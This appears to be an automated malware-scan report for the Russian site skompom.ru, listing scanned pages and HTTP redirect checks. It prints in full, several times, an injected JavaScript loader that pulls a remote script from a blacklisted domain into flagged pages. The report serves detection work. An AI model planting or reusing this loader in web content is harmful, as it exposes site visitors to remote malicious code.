Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skompom.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://skompom.ru/ | 200 OK Content-Length: 54326 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ | ||
http://skompom.ru/sites/default/files/js/js_xAPl0qIk9eowy_iS9tNkCWXLUVoat94SQT48UBCFkyQ.js | 200 OK Content-Length: 96126 Content-Type: application/x-javascript | clean |
http://skompom.ru/sites/default/files/js/js_ievO-gGDOOhx9NZFwKhliScturNlXfL28QWfaoOiprA.js | 200 OK Content-Length: 24875 Content-Type: application/x-javascript | clean |
http://skompom.ru/sites/all/modules/cumulus/cumulus.js?n928az | 200 OK Content-Length: 5955 Content-Type: application/x-javascript | clean |
http://skompom.ru/sites/default/files/js/js_TIuyLr0YTVTxhdFMvUg34karSh-d7gJTJRukMWWIdJk.js | 200 OK Content-Length: 67826 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2869794 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://skompom.ru/bios | 200 OK Content-Length: 42170 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ | ||
http://skompom.ru/sites/default/files/js/js_I23gxiikXxx_6GGz6rJ54UoPf8kO1zLBQwc8jUznXYM.js | 200 OK Content-Length: 3425 Content-Type: application/x-javascript | clean |
http://skompom.ru/sites/default/files/js/js_ktL-3_-m6xhaHFiBP_JCUQHiB6tr_Z2FmhRvr_gIaZk.js | 200 OK Content-Length: 25797 Content-Type: application/x-javascript | clean |
http://skompom.ru/sites/default/files/js/js_uc8gwMH6JrPJ5BoIRLW5P8Fd49GpzY9S1EqBdq4IZCE.js | 200 OK Content-Length: 2016 Content-Type: application/x-javascript | clean |
http://skompom.ru/windows | 200 OK Content-Length: 58755 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ | ||
http://skompom.ru/internet | 200 OK Content-Length: 54893 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ | ||
http://skompom.ru/soft | 200 OK Content-Length: 54284 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ | ||
http://skompom.ru/bezopasnost | 200 OK Content-Length: 46298 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rgqejqfaxy.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://rgqejqfaxy.about-home.info' + '/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://rgqejqfaxy.about-home.info/?508950=YitiZDB0enl1fX9yZSsnJCUhIi4"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skompom.ru
Result:
HTTP/1.1 200 OK
Cache-Control: public, max-age=0
Connection: close
Date: Thu, 31 Jul 2014 03:12:14 GMT
ETag: "1406773394-0"
Server: nginx
Vary: Cookie,Accept-Encoding
Content-Language: ru
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 31 Jul 2014 02:23:14 +0000
Link: <http://skompom.ru/>; rel="canonical",<http://skompom.ru/>; rel="shortlink"
X-Drupal-Cache: HIT
X-XRDS-Location: http://skompom.ru/xrds
X-Yadis-Location: http://skompom.ru/xrds
GET / HTTP/1.1
Host: skompom.ru
Result:
HTTP/1.1 200 OK
Cache-Control: public, max-age=0
Connection: close
Date: Thu, 31 Jul 2014 03:12:14 GMT
ETag: "1406773394-0"
Server: nginx
Vary: Cookie,Accept-Encoding
Content-Language: ru
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 31 Jul 2014 02:23:14 +0000
Link: <http://skompom.ru/>; rel="canonical",<http://skompom.ru/>; rel="shortlink"
X-Drupal-Cache: HIT
X-XRDS-Location: http://skompom.ru/xrds
X-Yadis-Location: http://skompom.ru/xrds
Second query (visit from search engine):
GET / HTTP/1.1
Host: skompom.ru
Referer: http://www.google.com/search?q=skompom.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skompom.ru
Referer: http://www.google.com/search?q=skompom.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.